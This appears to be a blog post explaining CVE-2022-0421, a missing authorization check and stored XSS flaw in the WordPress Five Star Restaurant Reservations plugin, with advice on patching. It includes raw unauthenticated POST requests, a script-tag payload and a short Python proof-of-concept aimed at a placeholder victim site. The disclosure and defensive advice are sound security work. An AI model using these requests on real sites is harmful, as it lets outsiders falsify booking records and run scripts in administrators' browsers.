CVE-2022-0421 - How a WordPress Restaurant Plugin Let Anyone Tamper with Your Bookings and Attack Your Admin

WordPress powers millions of websites, from small blogs to bustling businesses. But sometimes, things slip through the cracks. Today, we’re taking a deep dive into CVE-2022-0421 — a nasty vulnerability in the popular Five Star Restaurant Reservations plugin (before version 2.4.12) that could let an outsider mess with your restaurant bookings *and* target your admin users with dangerous scripts.

Let’s unpack what really happened, why it matters, and how attackers could use it against you.

What Is the Five Star Restaurant Reservations Plugin?

If you run a restaurant website on WordPress, this plugin helps you take and manage online reservations. Make it easy for customers, great! But when it comes to security, this plugin dropped the ball — big time.

1. No Authorization When Changing Payment Status

Anyone on the internet — even if they’re *not* logged in — could change a booking’s payment result from successful to failed (or vice versa). All an attacker needs is the right booking ID.

### 2. No Data Sanitization/Escaping (Leads to XSS)

Because the plugin did not properly clean up user input, attackers could inject malicious scripts into the “reason” text shown for failed payments. If an administrator opened the bookings dashboard, those scripts could run in their browser. This is called Cross-Site Scripting (XSS).

1. Arbitrary Payment Status Change

Suppose your website takes bookings, and each has an ID (like booking_id=123). The plugin offered an endpoint (or Ajax handler, depending on code setup) to update the status of a booking — for example:

POST /wp-admin/admin-ajax.php?action=booking_payment_status

But — and here’s the key — it did not check if the person making the request was authorized (like logged-in staff or the booking owner).

So anyone could send

POST /wp-admin/admin-ajax.php?action=booking_payment_status
Content-Type: application/x-www-form-urlencoded

booking_id=123&status=failed&reason=Testing123

And the status would change! That means attackers could falsify records to show failed or successful payments, cause chaos in your reservation system, or cover their tracks after mischief.

2. Stored XSS Attack

The reason parameter is stored in the booking record. If the plugin didn’t sanitize or escape it, an attacker could do something like:

booking_id=124&status=failed&reason=<script>alert('Gotcha!');</script>

Proof of Concept (PoC): Exploit Code Example

Here’s a basic Python script to demonstrate both attacks. For a real site, you’d need the victim’s site URL and a valid booking ID.

import requests

# Set your victim's site URL here
site_url = 'https://victim-restaurant.com';

# Example booking ID (would need to brute-force or guess)
booking_id = 123

# Malicious payload for XSS
malicious_reason = "<script>alert('XSS by CVE-2022-0421');</script>"

# Build POST data
data = {
    'action': 'booking_payment_status',
    'booking_id': booking_id,
    'status': 'failed',
    'reason': malicious_reason,
}

# Exploit the XSS and payment status bug
r = requests.post(f'{site_url}/wp-admin/admin-ajax.php', data=data)
print(f"Exploit Response Code: {r.status_code}")
print(f"Exploit Response Text: {r.text}")

Just by running the above (no login required!), the attacker changes the payment status and injects an alert box script.

Who Fixed It? When?

The Five Star Restaurant Reservations team fixed the issue in version 2.4.12. If you use this plugin, you NEED to update *immediately*.

Changelog & References

- WPScan Advisory
- Patchstack Post
- Plugin Page

How to Protect Your Site

1. Update the Plugin: Go to your WordPress admin, check for plugin updates, and make sure you’re running at least 2.4.12.

Review Bookings: Check for suspicious failed payment reasons or status changes.

3. Sanitize All Input: For developers — *always* check permissions and clean up user input, especially in AJAX handlers.

Summary

- CVE-2022-0421 let *anyone* (no login needed) set payment results or inject malicious scripts in Five Star Restaurant Reservations < 2.4.12.

Patch now! And always treat plugins and user data with suspicion.

If you liked this breakdown, follow me for more plain-English guides to critical WordPress bugs and web safety tips!

Timeline

Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 15:45:00 UTC